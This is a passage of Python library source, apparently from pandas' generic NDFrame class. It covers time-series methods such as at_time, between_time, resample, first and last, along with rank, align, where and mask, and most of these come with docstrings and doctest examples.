>>> df = pd.DataFrame({'s':series})
>>> df
s
2000-01-01 00:00:00 0.0
2000-01-01 00:01:00 NaN
2000-01-01 00:02:00 2.0
2000-01-01 00:03:00 3.0
Upsample the series into 30 second bins.
>>> df.asfreq(freq='30S')
s
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 NaN
2000-01-01 00:01:00 NaN
2000-01-01 00:01:30 NaN
2000-01-01 00:02:00 2.0
2000-01-01 00:02:30 NaN
2000-01-01 00:03:00 3.0
Upsample again, providing a ``fill value``.
>>> df.asfreq(freq='30S', fill_value=9.0)
s
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 9.0
2000-01-01 00:01:00 NaN
2000-01-01 00:01:30 9.0
2000-01-01 00:02:00 2.0
2000-01-01 00:02:30 9.0
2000-01-01 00:03:00 3.0
Upsample again, providing a ``method``.
>>> df.asfreq(freq='30S', method='bfill')
s
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 NaN
2000-01-01 00:01:00 NaN
2000-01-01 00:01:30 2.0
2000-01-01 00:02:00 2.0
2000-01-01 00:02:30 3.0
2000-01-01 00:03:00 3.0
"""
from pandas.core.resample import asfreq
return asfreq(
self,
freq,
method=method,
how=how,
normalize=normalize,
fill_value=fill_value,
)
def at_time(
self: FrameOrSeries, time, asof: bool_t = False, axis=None
) -> FrameOrSeries:
"""
Select values at particular time of day (e.g., 9:30AM).
Parameters
----------
time : datetime.time or str
axis : {0 or 'index', 1 or 'columns'}, default 0
.. versionadded:: 0.24.0
Returns
-------
Series or DataFrame
Raises
------
TypeError
If the index is not a :class:`DatetimeIndex`
See Also
--------
between_time : Select values between particular times of the day.
first : Select initial periods of time series based on a date offset.
last : Select final periods of time series based on a date offset.
DatetimeIndex.indexer_at_time : Get just the index locations for
values at particular time of the day.
Examples
--------
>>> i = pd.date_range('2018-04-09', periods=4, freq='12H')
>>> ts = pd.DataFrame({'A': [1, 2, 3, 4]}, index=i)
>>> ts
A
2018-04-09 00:00:00 1
2018-04-09 12:00:00 2
2018-04-10 00:00:00 3
2018-04-10 12:00:00 4
>>> ts.at_time('12:00')
A
2018-04-09 12:00:00 2
2018-04-10 12:00:00 4
"""
if axis is None:
axis = self._stat_axis_number
axis = self._get_axis_number(axis)
index = self._get_axis(axis)
try:
indexer = index.indexer_at_time(time, asof=asof)
except AttributeError as err:
raise TypeError("Index must be DatetimeIndex") from err
return self._take_with_is_copy(indexer, axis=axis)
def between_time(
self: FrameOrSeries,
start_time,
end_time,
include_start: bool_t = True,
include_end: bool_t = True,
axis=None,
) -> FrameOrSeries:
"""
Select values between particular times of the day (e.g., 9:00-9:30 AM).
By setting ``start_time`` to be later than ``end_time``,
you can get the times that are *not* between the two times.
Parameters
----------
start_time : datetime.time or str
Initial time as a time filter limit.
end_time : datetime.time or str
End time as a time filter limit.
include_start : bool, default True
Whether the start time needs to be included in the result.
include_end : bool, default True
Whether the end time needs to be included in the result.
axis : {0 or 'index', 1 or 'columns'}, default 0
Determine range time on index or columns value.
.. versionadded:: 0.24.0
Returns
-------
Series or DataFrame
Data from the original object filtered to the specified dates range.
Raises
------
TypeError
If the index is not a :class:`DatetimeIndex`
See Also
--------
at_time : Select values at a particular time of the day.
first : Select initial periods of time series based on a date offset.
last : Select final periods of time series based on a date offset.
DatetimeIndex.indexer_between_time : Get just the index locations for
values between particular times of the day.
Examples
--------
>>> i = pd.date_range('2018-04-09', periods=4, freq='1D20min')
>>> ts = pd.DataFrame({'A': [1, 2, 3, 4]}, index=i)
>>> ts
A
2018-04-09 00:00:00 1
2018-04-10 00:20:00 2
2018-04-11 00:40:00 3
2018-04-12 01:00:00 4
>>> ts.between_time('0:15', '0:45')
A
2018-04-10 00:20:00 2
2018-04-11 00:40:00 3
You get the times that are *not* between two times by setting
``start_time`` later than ``end_time``:
>>> ts.between_time('0:45', '0:15')
A
2018-04-09 00:00:00 1
2018-04-12 01:00:00 4
"""
if axis is None:
axis = self._stat_axis_number
axis = self._get_axis_number(axis)
index = self._get_axis(axis)
try:
indexer = index.indexer_between_time(
start_time,
end_time,
include_start=include_start,
include_end=include_end,
)
except AttributeError as err:
raise TypeError("Index must be DatetimeIndex") from err
return self._take_with_is_copy(indexer, axis=axis)
def resample(
self,
rule,
axis=0,
closed: Optional[str] = None,
label: Optional[str] = None,
convention: str = "start",
kind: Optional[str] = None,
loffset=None,
base: int = 0,
on=None,
level=None,
) -> "Resampler":
"""
Resample time-series data.
Convenience method for frequency conversion and resampling of time
series. Object must have a datetime-like index (`DatetimeIndex`,
`PeriodIndex`, or `TimedeltaIndex`), or pass datetime-like values
to the `on` or `level` keyword.
Parameters
----------
rule : DateOffset, Timedelta or str
The offset string or object representing target conversion.
axis : {0 or 'index', 1 or 'columns'}, default 0
Which axis to use for up- or down-sampling. For `Series` this
will default to 0, i.e. along the rows. Must be
`DatetimeIndex`, `TimedeltaIndex` or `PeriodIndex`.
closed : {'right', 'left'}, default None
Which side of bin interval is closed. The default is 'left'
for all frequency offsets except for 'M', 'A', 'Q', 'BM',
'BA', 'BQ', and 'W' which all have a default of 'right'.
label : {'right', 'left'}, default None
Which bin edge label to label bucket with. The default is 'left'
for all frequency offsets except for 'M', 'A', 'Q', 'BM',
'BA', 'BQ', and 'W' which all have a default of 'right'.
convention : {'start', 'end', 's', 'e'}, default 'start'
For `PeriodIndex` only, controls whether to use the start or
end of `rule`.
kind : {'timestamp', 'period'}, optional, default None
Pass 'timestamp' to convert the resulting index to a
`DateTimeIndex` or 'period' to convert it to a `PeriodIndex`.
By default the input representation is retained.
loffset : timedelta, default None
Adjust the resampled time labels.
base : int, default 0
For frequencies that evenly subdivide 1 day, the "origin" of the
aggregated intervals. For example, for '5min' frequency, base could
range from 0 through 4. Defaults to 0.
on : str, optional
For a DataFrame, column to use instead of index for resampling.
Column must be datetime-like.
level : str or int, optional
For a MultiIndex, level (name or number) to use for
resampling. `level` must be datetime-like.
Returns
-------
Resampler object
See Also
--------
groupby : Group by mapping, function, label, or list of labels.
Series.resample : Resample a Series.
DataFrame.resample: Resample a DataFrame.
Notes
-----
See the `user guide
<https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#resampling>`_
for more.
To learn more about the offset strings, please see `this link
<https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#dateoffset-objects>`__.
Examples
--------
Start by creating a series with 9 one minute timestamps.
>>> index = pd.date_range('1/1/2000', periods=9, freq='T')
>>> series = pd.Series(range(9), index=index)
>>> series
2000-01-01 00:00:00 0
2000-01-01 00:01:00 1
2000-01-01 00:02:00 2
2000-01-01 00:03:00 3
2000-01-01 00:04:00 4
2000-01-01 00:05:00 5
2000-01-01 00:06:00 6
2000-01-01 00:07:00 7
2000-01-01 00:08:00 8
Freq: T, dtype: int64
Downsample the series into 3 minute bins and sum the values
of the timestamps falling into a bin.
>>> series.resample('3T').sum()
2000-01-01 00:00:00 3
2000-01-01 00:03:00 12
2000-01-01 00:06:00 21
Freq: 3T, dtype: int64
Downsample the series into 3 minute bins as above, but label each
bin using the right edge instead of the left. Please note that the
value in the bucket used as the label is not included in the bucket,
which it labels. For example, in the original series the
bucket ``2000-01-01 00:03:00`` contains the value 3, but the summed
value in the resampled bucket with the label ``2000-01-01 00:03:00``
does not include 3 (if it did, the summed value would be 6, not 3).
To include this value close the right side of the bin interval as
illustrated in the example below this one.
>>> series.resample('3T', label='right').sum()
2000-01-01 00:03:00 3
2000-01-01 00:06:00 12
2000-01-01 00:09:00 21
Freq: 3T, dtype: int64
Downsample the series into 3 minute bins as above, but close the right
side of the bin interval.
>>> series.resample('3T', label='right', closed='right').sum()
2000-01-01 00:00:00 0
2000-01-01 00:03:00 6
2000-01-01 00:06:00 15
2000-01-01 00:09:00 15
Freq: 3T, dtype: int64
Upsample the series into 30 second bins.
>>> series.resample('30S').asfreq()[0:5] # Select first 5 rows
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 NaN
2000-01-01 00:01:00 1.0
2000-01-01 00:01:30 NaN
2000-01-01 00:02:00 2.0
Freq: 30S, dtype: float64
Upsample the series into 30 second bins and fill the ``NaN``
values using the ``pad`` method.
>>> series.resample('30S').pad()[0:5]
2000-01-01 00:00:00 0
2000-01-01 00:00:30 0
2000-01-01 00:01:00 1
2000-01-01 00:01:30 1
2000-01-01 00:02:00 2
Freq: 30S, dtype: int64
Upsample the series into 30 second bins and fill the
``NaN`` values using the ``bfill`` method.
>>> series.resample('30S').bfill()[0:5]
2000-01-01 00:00:00 0
2000-01-01 00:00:30 1
2000-01-01 00:01:00 1
2000-01-01 00:01:30 2
2000-01-01 00:02:00 2
Freq: 30S, dtype: int64
Pass a custom function via ``apply``
>>> def custom_resampler(array_like):
... return np.sum(array_like) + 5
...
>>> series.resample('3T').apply(custom_resampler)
2000-01-01 00:00:00 8
2000-01-01 00:03:00 17
2000-01-01 00:06:00 26
Freq: 3T, dtype: int64
For a Series with a PeriodIndex, the keyword `convention` can be
used to control whether to use the start or end of `rule`.
Resample a year by quarter using 'start' `convention`. Values are
assigned to the first quarter of the period.
>>> s = pd.Series([1, 2], index=pd.period_range('2012-01-01',
... freq='A',
... periods=2))
>>> s
2012 1
2013 2
Freq: A-DEC, dtype: int64
>>> s.resample('Q', convention='start').asfreq()
2012Q1 1.0
2012Q2 NaN
2012Q3 NaN
2012Q4 NaN
2013Q1 2.0
2013Q2 NaN
2013Q3 NaN
2013Q4 NaN
Freq: Q-DEC, dtype: float64
Resample quarters by month using 'end' `convention`. Values are
assigned to the last month of the period.
>>> q = pd.Series([1, 2, 3, 4], index=pd.period_range('2018-01-01',
... freq='Q',
... periods=4))
>>> q
2018Q1 1
2018Q2 2
2018Q3 3
2018Q4 4
Freq: Q-DEC, dtype: int64
>>> q.resample('M', convention='end').asfreq()
2018-03 1.0
2018-04 NaN
2018-05 NaN
2018-06 2.0
2018-07 NaN
2018-08 NaN
2018-09 3.0
2018-10 NaN
2018-11 NaN
2018-12 4.0
Freq: M, dtype: float64
For DataFrame objects, the keyword `on` can be used to specify the
column instead of the index for resampling.
>>> d = dict({'price': [10, 11, 9, 13, 14, 18, 17, 19],
... 'volume': [50, 60, 40, 100, 50, 100, 40, 50]})
>>> df = pd.DataFrame(d)
>>> df['week_starting'] = pd.date_range('01/01/2018',
... periods=8,
... freq='W')
>>> df
price volume week_starting
0 10 50 2018-01-07
1 11 60 2018-01-14
2 9 40 2018-01-21
3 13 100 2018-01-28
4 14 50 2018-02-04
5 18 100 2018-02-11
6 17 40 2018-02-18
7 19 50 2018-02-25
>>> df.resample('M', on='week_starting').mean()
price volume
week_starting
2018-01-31 10.75 62.5
2018-02-28 17.00 60.0
For a DataFrame with MultiIndex, the keyword `level` can be used to
specify on which level the resampling needs to take place.
>>> days = pd.date_range('1/1/2000', periods=4, freq='D')
>>> d2 = dict({'price': [10, 11, 9, 13, 14, 18, 17, 19],
... 'volume': [50, 60, 40, 100, 50, 100, 40, 50]})
>>> df2 = pd.DataFrame(d2,
... index=pd.MultiIndex.from_product([days,
... ['morning',
... 'afternoon']]
... ))
>>> df2
price volume
2000-01-01 morning 10 50
afternoon 11 60
2000-01-02 morning 9 40
afternoon 13 100
2000-01-03 morning 14 50
afternoon 18 100
2000-01-04 morning 17 40
afternoon 19 50
>>> df2.resample('D', level=0).sum()
price volume
2000-01-01 21 110
2000-01-02 22 140
2000-01-03 32 150
2000-01-04 36 90
"""
from pandas.core.resample import get_resampler
axis = self._get_axis_number(axis)
return get_resampler(
self,
freq=rule,
label=label,
closed=closed,
axis=axis,
kind=kind,
loffset=loffset,
convention=convention,
base=base,
key=on,
level=level,
)
def first(self: FrameOrSeries, offset) -> FrameOrSeries:
"""
Method to subset initial periods of time series data based on a date offset.
Parameters
----------
offset : str, DateOffset, dateutil.relativedelta
Returns
-------
subset : same type as caller
Raises
------
TypeError
If the index is not a :class:`DatetimeIndex`
See Also
--------
last : Select final periods of time series based on a date offset.
at_time : Select values at a particular time of the day.
between_time : Select values between particular times of the day.
Examples
--------
>>> i = pd.date_range('2018-04-09', periods=4, freq='2D')
>>> ts = pd.DataFrame({'A': [1,2,3,4]}, index=i)
>>> ts
A
2018-04-09 1
2018-04-11 2
2018-04-13 3
2018-04-15 4
Get the rows for the first 3 days:
>>> ts.first('3D')
A
2018-04-09 1
2018-04-11 2
Notice the data for 3 first calender days were returned, not the first
3 days observed in the dataset, and therefore data for 2018-04-13 was
not returned.
"""
if not isinstance(self.index, DatetimeIndex):
raise TypeError("'first' only supports a DatetimeIndex index")
if len(self.index) == 0:
return self
offset = to_offset(offset)
end_date = end = self.index[0] + offset
# Tick-like, e.g. 3 weeks
if not offset.is_anchored() and hasattr(offset, "_inc"):
if end_date in self.index:
end = self.index.searchsorted(end_date, side="left")
return self.iloc[:end]
return self.loc[:end]
def last(self: FrameOrSeries, offset) -> FrameOrSeries:
"""
Method to subset final periods of time series data based on a date offset.
Parameters
----------
offset : str, DateOffset, dateutil.relativedelta
Returns
-------
subset : same type as caller
Raises
------
TypeError
If the index is not a :class:`DatetimeIndex`
See Also
--------
first : Select initial periods of time series based on a date offset.
at_time : Select values at a particular time of the day.
between_time : Select values between particular times of the day.
Examples
--------
>>> i = pd.date_range('2018-04-09', periods=4, freq='2D')
>>> ts = pd.DataFrame({'A': [1, 2, 3, 4]}, index=i)
>>> ts
A
2018-04-09 1
2018-04-11 2
2018-04-13 3
2018-04-15 4
Get the rows for the last 3 days:
>>> ts.last('3D')
A
2018-04-13 3
2018-04-15 4
Notice the data for 3 last calender days were returned, not the last
3 observed days in the dataset, and therefore data for 2018-04-11 was
not returned.
"""
if not isinstance(self.index, DatetimeIndex):
raise TypeError("'last' only supports a DatetimeIndex index")
if len(self.index) == 0:
return self
offset = to_offset(offset)
start_date = self.index[-1] - offset
start = self.index.searchsorted(start_date, side="right")
return self.iloc[start:]
def rank(
self: FrameOrSeries,
axis=0,
method: str = "average",
numeric_only: Optional[bool_t] = None,
na_option: str = "keep",
ascending: bool_t = True,
pct: bool_t = False,
) -> FrameOrSeries:
"""
Compute numerical data ranks (1 through n) along axis.
By default, equal values are assigned a rank that is the average of the
ranks of those values.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
Index to direct ranking.
method : {'average', 'min', 'max', 'first', 'dense'}, default 'average'
How to rank the group of records that have the same value (i.e. ties):
* average: average rank of the group
* min: lowest rank in the group
* max: highest rank in the group
* first: ranks assigned in order they appear in the array
* dense: like 'min', but rank always increases by 1 between groups.
numeric_only : bool, optional
For DataFrame objects, rank only numeric columns if set to True.
na_option : {'keep', 'top', 'bottom'}, default 'keep'
How to rank NaN values:
* keep: assign NaN rank to NaN values
* top: assign smallest rank to NaN values if ascending
* bottom: assign highest rank to NaN values if ascending.
ascending : bool, default True
Whether or not the elements should be ranked in ascending order.
pct : bool, default False
Whether or not to display the returned rankings in percentile
form.
Returns
-------
same type as caller
Return a Series or DataFrame with data ranks as values.
See Also
--------
core.groupby.GroupBy.rank : Rank of values within each group.
Examples
--------
>>> df = pd.DataFrame(data={'Animal': ['cat', 'penguin', 'dog',
... 'spider', 'snake'],
... 'Number_legs': [4, 2, 4, 8, np.nan]})
>>> df
Animal Number_legs
0 cat 4.0
1 penguin 2.0
2 dog 4.0
3 spider 8.0
4 snake NaN
The following example shows how the method behaves with the above
parameters:
* default_rank: this is the default behaviour obtained without using
any parameter.
* max_rank: setting ``method = 'max'`` the records that have the
same values are ranked using the highest rank (e.g.: since 'cat'
and 'dog' are both in the 2nd and 3rd position, rank 3 is assigned.)
* NA_bottom: choosing ``na_option = 'bottom'``, if there are records
with NaN values they are placed at the bottom of the ranking.
* pct_rank: when setting ``pct = True``, the ranking is expressed as
percentile rank.
>>> df['default_rank'] = df['Number_legs'].rank()
>>> df['max_rank'] = df['Number_legs'].rank(method='max')
>>> df['NA_bottom'] = df['Number_legs'].rank(na_option='bottom')
>>> df['pct_rank'] = df['Number_legs'].rank(pct=True)
>>> df
Animal Number_legs default_rank max_rank NA_bottom pct_rank
0 cat 4.0 2.5 3.0 2.5 0.625
1 penguin 2.0 1.0 1.0 1.0 0.250
2 dog 4.0 2.5 3.0 2.5 0.625
3 spider 8.0 4.0 4.0 4.0 1.000
4 snake NaN NaN NaN 5.0 NaN
"""
axis = self._get_axis_number(axis)
if na_option not in {"keep", "top", "bottom"}:
msg = "na_option must be one of 'keep', 'top', or 'bottom'"
raise ValueError(msg)
def ranker(data):
ranks = algos.rank(
data.values,
axis=axis,
method=method,
ascending=ascending,
na_option=na_option,
pct=pct,
)
ranks = self._constructor(ranks, **data._construct_axes_dict())
return ranks.__finalize__(self)
# if numeric_only is None, and we can't get anything, we try with
# numeric_only=True
if numeric_only is None:
try:
return ranker(self)
except TypeError:
numeric_only = True
if numeric_only:
data = self._get_numeric_data()
else:
data = self
return ranker(data)
_shared_docs[
"align"
] = """
Align two objects on their axes with the specified join method.
Join method is specified for each axis Index.
Parameters
----------
other : DataFrame or Series
join : {'outer', 'inner', 'left', 'right'}, default 'outer'
axis : allowed axis of the other object, default None
Align on index (0), columns (1), or both (None).
level : int or level name, default None
Broadcast across a level, matching Index values on the
passed MultiIndex level.
copy : bool, default True
Always returns new objects. If copy=False and no reindexing is
required then original objects are returned.
fill_value : scalar, default np.NaN
Value to use for missing values. Defaults to NaN, but can be any
"compatible" value.
method : {'backfill', 'bfill', 'pad', 'ffill', None}, default None
Method to use for filling holes in reindexed Series:
- pad / ffill: propagate last valid observation forward to next valid.
- backfill / bfill: use NEXT valid observation to fill gap.
limit : int, default None
If method is specified, this is the maximum number of consecutive
NaN values to forward/backward fill. In other words, if there is
a gap with more than this number of consecutive NaNs, it will only
be partially filled. If method is not specified, this is the
maximum number of entries along the entire axis where NaNs will be
filled. Must be greater than 0 if not None.
fill_axis : %(axes_single_arg)s, default 0
Filling axis, method and limit.
broadcast_axis : %(axes_single_arg)s, default None
Broadcast values along this axis, if aligning two objects of
different dimensions.
Returns
-------
(left, right) : (%(klass)s, type of other)
Aligned objects.
"""
@Appender(_shared_docs["align"] % _shared_doc_kwargs)
def align(
self,
other,
join="outer",
axis=None,
level=None,
copy=True,
fill_value=None,
method=None,
limit=None,
fill_axis=0,
broadcast_axis=None,
):
method = missing.clean_fill_method(method)
if broadcast_axis == 1 and self.ndim != other.ndim:
if isinstance(self, ABCSeries):
# this means other is a DataFrame, and we need to broadcast
# self
cons = self._constructor_expanddim
df = cons(
{c: self for c in other.columns}, **other._construct_axes_dict()
)
return df._align_frame(
other,
join=join,
axis=axis,
level=level,
copy=copy,
fill_value=fill_value,
method=method,
limit=limit,
fill_axis=fill_axis,
)
elif isinstance(other, ABCSeries):
# this means self is a DataFrame, and we need to broadcast
# other
cons = other._constructor_expanddim
df = cons(
{c: other for c in self.columns}, **self._construct_axes_dict()
)
return self._align_frame(
df,
join=join,
axis=axis,
level=level,
copy=copy,
fill_value=fill_value,
method=method,
limit=limit,
fill_axis=fill_axis,
)
if axis is not None:
axis = self._get_axis_number(axis)
if isinstance(other, ABCDataFrame):
return self._align_frame(
other,
join=join,
axis=axis,
level=level,
copy=copy,
fill_value=fill_value,
method=method,
limit=limit,
fill_axis=fill_axis,
)
elif isinstance(other, ABCSeries):
return self._align_series(
other,
join=join,
axis=axis,
level=level,
copy=copy,
fill_value=fill_value,
method=method,
limit=limit,
fill_axis=fill_axis,
)
else: # pragma: no cover
raise TypeError(f"unsupported type: {type(other)}")
def _align_frame(
self,
other,
join="outer",
axis=None,
level=None,
copy: bool_t = True,
fill_value=None,
method=None,
limit=None,
fill_axis=0,
):
# defaults
join_index, join_columns = None, None
ilidx, iridx = None, None
clidx, cridx = None, None
is_series = isinstance(self, ABCSeries)
if axis is None or axis == 0:
if not self.index.equals(other.index):
join_index, ilidx, iridx = self.index.join(
other.index, how=join, level=level, return_indexers=True
)
if axis is None or axis == 1:
if not is_series and not self.columns.equals(other.columns):
join_columns, clidx, cridx = self.columns.join(
other.columns, how=join, level=level, return_indexers=True
)
if is_series:
reindexers = {0: [join_index, ilidx]}
else:
reindexers = {0: [join_index, ilidx], 1: [join_columns, clidx]}
left = self._reindex_with_indexers(
reindexers, copy=copy, fill_value=fill_value, allow_dups=True
)
# other must be always DataFrame
right = other._reindex_with_indexers(
{0: [join_index, iridx], 1: [join_columns, cridx]},
copy=copy,
fill_value=fill_value,
allow_dups=True,
)
if method is not None:
left = self._ensure_type(
left.fillna(method=method, axis=fill_axis, limit=limit)
)
right = right.fillna(method=method, axis=fill_axis, limit=limit)
# if DatetimeIndex have different tz, convert to UTC
if is_datetime64tz_dtype(left.index):
if left.index.tz != right.index.tz:
if join_index is not None:
left.index = join_index
right.index = join_index
return left.__finalize__(self), right.__finalize__(other)
def _align_series(
self,
other,
join="outer",
axis=None,
level=None,
copy: bool_t = True,
fill_value=None,
method=None,
limit=None,
fill_axis=0,
):
is_series = isinstance(self, ABCSeries)
# series/series compat, other must always be a Series
if is_series:
if axis:
raise ValueError("cannot align series to a series other than axis 0")
# equal
if self.index.equals(other.index):
join_index, lidx, ridx = None, None, None
else:
join_index, lidx, ridx = self.index.join(
other.index, how=join, level=level, return_indexers=True
)
left = self._reindex_indexer(join_index, lidx, copy)
right = other._reindex_indexer(join_index, ridx, copy)
else:
# one has > 1 ndim
fdata = self._data
if axis == 0:
join_index = self.index
lidx, ridx = None, None
if not self.index.equals(other.index):
join_index, lidx, ridx = self.index.join(
other.index, how=join, level=level, return_indexers=True
)
if lidx is not None:
fdata = fdata.reindex_indexer(join_index, lidx, axis=1)
elif axis == 1:
join_index = self.columns
lidx, ridx = None, None
if not self.columns.equals(other.index):
join_index, lidx, ridx = self.columns.join(
other.index, how=join, level=level, return_indexers=True
)
if lidx is not None:
fdata = fdata.reindex_indexer(join_index, lidx, axis=0)
else:
raise ValueError("Must specify axis=0 or 1")
if copy and fdata is self._data:
fdata = fdata.copy()
left = self._constructor(fdata)
if ridx is None:
right = other
else:
right = other.reindex(join_index, level=level)
# fill
fill_na = notna(fill_value) or (method is not None)
if fill_na:
left = left.fillna(fill_value, method=method, limit=limit, axis=fill_axis)
right = right.fillna(fill_value, method=method, limit=limit)
# if DatetimeIndex have different tz, convert to UTC
if is_series or (not is_series and axis == 0):
if is_datetime64tz_dtype(left.index):
if left.index.tz != right.index.tz:
if join_index is not None:
left.index = join_index
right.index = join_index
return left.__finalize__(self), right.__finalize__(other)
def _where(
self,
cond,
other=np.nan,
inplace=False,
axis=None,
level=None,
errors="raise",
try_cast=False,
):
"""
Equivalent to public method `where`, except that `other` is not
applied as a function even if callable. Used in __setitem__.
"""
inplace = validate_bool_kwarg(inplace, "inplace")
# align the cond to same shape as myself
cond = com.apply_if_callable(cond, self)
if isinstance(cond, NDFrame):
cond, _ = cond.align(self, join="right", broadcast_axis=1)
else:
if not hasattr(cond, "shape"):
cond = np.asanyarray(cond)
if cond.shape != self.shape:
raise ValueError("Array conditional must be same shape as self")
cond = self._constructor(cond, **self._construct_axes_dict())
# make sure we are boolean
fill_value = bool(inplace)
cond = cond.fillna(fill_value)
msg = "Boolean array expected for the condition, not {dtype}"
if not isinstance(cond, ABCDataFrame):
# This is a single-dimensional object.
if not is_bool_dtype(cond):
raise ValueError(msg.format(dtype=cond.dtype))
elif not cond.empty:
for dt in cond.dtypes:
if not is_bool_dtype(dt):
raise ValueError(msg.format(dtype=dt))
cond = -cond if inplace else cond
# try to align with other
try_quick = True
if hasattr(other, "align"):
# align with me
if other.ndim <= self.ndim:
_, other = self.align(
other, join="left", axis=axis, level=level, fill_value=np.nan
)
# if we are NOT aligned, raise as we cannot where index
if axis is None and not all(
other._get_axis(i).equals(ax) for i, ax in enumerate(self.axes)
):
raise InvalidIndexError
# slice me out of the other
else:
raise NotImplementedError(
"cannot align with a higher dimensional NDFrame"
)
if isinstance(other, np.ndarray):
if other.shape != self.shape:
if self.ndim == 1:
icond = cond.values
# GH 2745 / GH 4192
# treat like a scalar
if len(other) == 1:
other = np.array(other[0])
# GH 3235
# match True cond to other
elif len(cond[icond]) == len(other):
# try to not change dtype at first (if try_quick)
if try_quick:
new_other = com.values_from_object(self)
new_other = new_other.copy()
new_other[icond] = other
other = new_other
else:
raise ValueError(
"Length of replacements must equal series length"
)
else:
raise ValueError(
"other must be the same shape as self when an ndarray"
)
# we are the same shape, so create an actual object for alignment
else:
other = self._constructor(other, **self._construct_axes_dict())
if axis is None:
axis = 0
if self.ndim == getattr(other, "ndim", 0):
align = True
else:
align = self._get_axis_number(axis) == 1
block_axis = self._get_block_manager_axis(axis)
if inplace:
# we may have different type blocks come out of putmask, so
# reconstruct the block manager
self._check_inplace_setting(other)
new_data = self._data.putmask(
mask=cond,
new=other,
align=align,
inplace=True,
axis=block_axis,
transpose=self._AXIS_REVERSED,
)
self._update_inplace(new_data)
else:
new_data = self._data.where(
other=other,
cond=cond,
align=align,
errors=errors,
try_cast=try_cast,
axis=block_axis,
)
return self._constructor(new_data).__finalize__(self)
_shared_docs[
"where"
] = """
Replace values where the condition is %(cond_rev)s.
Parameters
----------
cond : bool %(klass)s, array-like, or callable
Where `cond` is %(cond)s, keep the original value. Where
%(cond_rev)s, replace with corresponding value from `other`.
If `cond` is callable, it is computed on the %(klass)s and
should return boolean %(klass)s or array. The callable must
not change input %(klass)s (though pandas doesn't check it).
other : scalar, %(klass)s, or callable
Entries where `cond` is %(cond_rev)s are replaced with
corresponding value from `other`.
If other is callable, it is computed on the %(klass)s and
should return scalar or %(klass)s. The callable must not
change input %(klass)s (though pandas doesn't check it).
inplace : bool, default False
Whether to perform the operation in place on the data.
axis : int, default None
Alignment axis if needed.
level : int, default None
Alignment level if needed.
errors : str, {'raise', 'ignore'}, default 'raise'
Note that currently this parameter won't affect
the results and will always coerce to a suitable dtype.
- 'raise' : allow exceptions to be raised.
- 'ignore' : suppress exceptions. On error return original object.
try_cast : bool, default False
Try to cast the result back to the input type (if possible).
Returns
-------
Same type as caller
See Also
--------
:func:`DataFrame.%(name_other)s` : Return an object of same shape as
self.
Notes
-----
The %(name)s method is an application of the if-then idiom. For each
element in the calling DataFrame, if ``cond`` is ``%(cond)s`` the
element is used; otherwise the corresponding element from the DataFrame
``other`` is used.
The signature for :func:`DataFrame.where` differs from
:func:`numpy.where`. Roughly ``df1.where(m, df2)`` is equivalent to
``np.where(m, df1, df2)``.
For further details and examples see the ``%(name)s`` documentation in
:ref:`indexing <indexing.where_mask>`.
Examples
--------
>>> s = pd.Series(range(5))
>>> s.where(s > 0)
0 NaN
1 1.0
2 2.0
3 3.0
4 4.0
dtype: float64
>>> s.mask(s > 0)
0 0.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
>>> s.where(s > 1, 10)
0 10
1 10
2 2
3 3
4 4
dtype: int64
>>> df = pd.DataFrame(np.arange(10).reshape(-1, 2), columns=['A', 'B'])
>>> df
A B
0 0 1
1 2 3
2 4 5
3 6 7
4 8 9
>>> m = df %% 3 == 0
>>> df.where(m, -df)
A B
0 0 -1
1 -2 3
2 -4 -5
3 6 -7
4 -8 9
>>> df.where(m, -df) == np.where(m, df, -df)
A B
0 True True
1 True True
2 True True
3 True True
4 True True
>>> df.where(m, -df) == df.mask(~m, -df)
A B
0 True True
1 True True
2 True True
3 True True
4 True True
"""
@Appender(
_shared_docs["where"]
% dict(
_shared_doc_kwargs,
cond="True",
cond_rev="False",
name="where",
name_other="mask",
)
)
def where(
self,
cond,
other=np.nan,
inplace=False,
axis=None,
level=None,
errors="raise",
try_cast=False,
):
other = com.apply_if_callable(other, self)
return self._where(
cond, other, inplace, axis, level, errors=errors, try_cast=try_cast
)
@Appender(
_shared_docs["where"]
% dict(
_shared_doc_kwargs,
cond="False",
cond_rev="True",
name="mask",
name_other="where",
)
)
def mask(
self,
cond,
other=np.nan,
inplace=False,
axis=None,
level=None,
errors="raise",
try_cast=False,
):
inplace = validate_bool_kwarg(inplace, "inplace")
cond = com.apply_if_callable(cond, self)
# see gh-21891
if not hasattr(cond, "__invert__"):
cond = np.array(cond)
return self.where(
~cond,
other=other,
inplace=inplace,
axis=axis,
level=level,
try_cast=try_cast,
errors=errors,
)
_shared_docs[
"shift"
] = """
Shift index by desired number of periods with an optional time `freq`.
When `freq` is not passed, shift the index without realigning the data.
If `freq` is passed (in this case, the index must be date or datetime,
or it will raise a `NotImplementedError`), the index will be
increased using the periods and the `freq`.
Parameters
----------
periods : int
Number of periods to shift. Can be positive or negative.
freq : DateOffset, tseries.offsets, timedelta, or str, optional
Offset to use from the tseries module or time rule (e.g. 'EOM').
If `freq` is specified then the index values are shifted but the
data is not realigned. That is, use `freq` if you would like to
extend the index when shifting and preserve the original data.
axis : {0 or 'index', 1 or 'columns', None}, default None
Shift direction.
fill_value : object, optional
The scalar value to use for newly introduced missing values.
the default depends on the dtype of `self`.
For numeric data, ``np.nan`` is used.
For datetime, timedelta, or period data, etc. :attr:`NaT` is used.
For extension dtypes, ``self.dtype.na_value`` is used.
.. versionchanged:: 0.24.0
Returns
-------
%(klass)s
Copy of input object, shifted.
See Also
--------
Index.shift : Shift values of Index.
DatetimeIndex.shift : Shift values of DatetimeIndex.
PeriodIndex.shift : Shift values of PeriodIndex.
tshift : Shift the time index, using the index's frequency if
available.
Examples
--------
>>> df = pd.DataFrame({'Col1': [10, 20, 15, 30, 45],
... 'Col2': [13, 23, 18, 33, 48],
... 'Col3': [17, 27, 22, 37, 52]})
>>> df.shift(periods=3)
Col1 Col2 Col3
0 NaN NaN NaN
1 NaN NaN NaN
2 NaN NaN NaN
3 10.0 13.0 17.0
4 20.0 23.0 27.0
>>> df.shift(periods=1, axis='columns')
Col1 Col2 Col3
0 NaN 10.0 13.0
1 NaN 20.0 23.0
2 NaN 15.0 18.0
3 NaN 30.0 33.0
